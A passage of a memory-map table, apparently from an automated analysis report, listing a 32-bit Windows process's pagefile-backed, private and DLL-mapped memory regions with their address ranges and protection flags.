| pagefile_0x0000000006da0000 | 0x06da0000 | 0x06e57fff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| winspool.drv | 0x6f3a0000 | 0x6f406fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x74960000 | 0x7497afff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76c90000 | 0x76d21fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f660000 | 0x7f660000 | 0x7f75ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f760000 | 0x7f760000 | 0x7f782fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f785000 | 0x7f785000 | 0x7f785fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f786000 | 0x7f786000 | 0x7f788fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f789000 | 0x7f789000 | 0x7f789fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f78a000 | 0x7f78a000 | 0x7f78cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f78d000 | 0x7f78d000 | 0x7f78ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
